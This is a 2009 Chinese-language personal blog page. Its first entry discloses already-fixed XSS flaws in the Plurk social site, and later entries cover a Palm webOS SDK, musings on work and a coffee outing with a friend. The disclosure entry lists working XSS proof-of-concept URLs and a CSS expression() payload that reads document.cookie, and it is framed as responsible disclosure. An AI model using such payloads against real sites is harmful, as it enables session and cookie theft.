2009/06/28

Plurk 一些漏洞揭露

紀念今天拿到 Karma 100,來把 Plurk 已經修復的漏洞講一下。
跟站長幾個月前就溝通來往好久了,不記錄一下自己都快忘記了。
就目前手上有記錄的幾個貼上來記錄一下...



還沒修補的幾個就留著等 A-Team 修補完畢囉!

XSS
http://www.plurk.com/m/ 幾乎都有 XSS 問題http://www.plurk.com/Notifications/?page=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.plurk.com/Users/confirmEmail?user=%3Cscript%3Ealert(/x/)%3b%3C/script%3E&key=x&email=z

http://www.plurk.com/m/s/?query=a%22%3E%3Cimg%20src=%22aaa%22%20onerror=%22javascript:alert('a')%3b%22%3E%3C%22

與訊息有關皆有onmouseover:  http://allenown.blogspot.com/"onmouseover="alert('XD');" ( http://allenown.blogspot.com )

Custom CSS:  body{ background-url: ex/**/pression(alert(document.cookie)); }

還有一些 CSRF 因為還需要修正就先不記錄了。
等跟站長們討論過後再來更新這篇。:D

很感謝 Plurk 團隊 A-Team 一直願意修補這些問題,在 Plurk Birthday Party 上 Alvin 也說很感謝我們沒有先在網路上揭露這些問題,並且拿來進行攻擊。
希望 Plurk 能夠越來越完美。:)

Palm webOS Mojo SDK 終於出現了

Torrent
http://www.mininova.org/tor/2719050

Tutorial
http://www.clickonchris.com/2009/06/tutorial-palm-pre-sdk/

可以來好好玩一下了...XD

感覺應該滿好撰寫的..
不過更深入的功能就不知道了...

2009/06/26

寫作業,混過關。
期末考,混 Pass。
研究所,混畢業。
上班,混著等下班。

以為自己頂著什麼什麼的光環,有學歷?有地位?有人脈?就可以混過一切?
但是你的人生也就這樣給你混過去了啊。
有什麼意義嗎?

無法苟同。
道不同,不相為謀。

2009/06/19

最近真的是忙到不行...

最近真的是忙到一個不行啊。
因為要配合未來的超大計畫,所以勢必要做大修改...
之前開發團隊 (團隊嗎?XD) 一開始當然也不會想那麼多,到後面需要改的時候就真的是超級辛苦了...



畫著流程圖,用 MindMap 想著各種可能。
最近心煩意亂,就連思緒都跟著打結。

修行還不足...
需要站在更遠的地方來看待每一件事情...

加油!

2009/06/17

少林的 Starbucks 星冰樂

今天少林來公司找我一起喝星冰樂!
但是沒在那麼早就吃晚餐的啦,才五點耶...
而且公司還在忙一些東西 (絕對不是 Burn Rate!!)
所以就只有先讓少林去吃晚餐了。

八點我吃完晚餐去重慶南路的 Starbucks 找少林。
以前在這邊念書的時候感覺真的很愉快,好像很有靈感的磁場都在這邊。



少林好認真!好像被我打擾到了...XD
滿桌的 3C 產品...



喜歡喝的焦糖可可碎片沒了,只有喝了個巧克力可可。
少林很慷慨的只收我零錢。

聊了很多東西,其實跟有在同一個層次的人聊天真的是會很愉快的...
彼此的想法可以激發出很多更有趣的東西。
所以之前才會一直想要組一個好 Team 來玩一些東西...

聊到快十點就一邊走去搭車了。
希望少林的口試順利啊!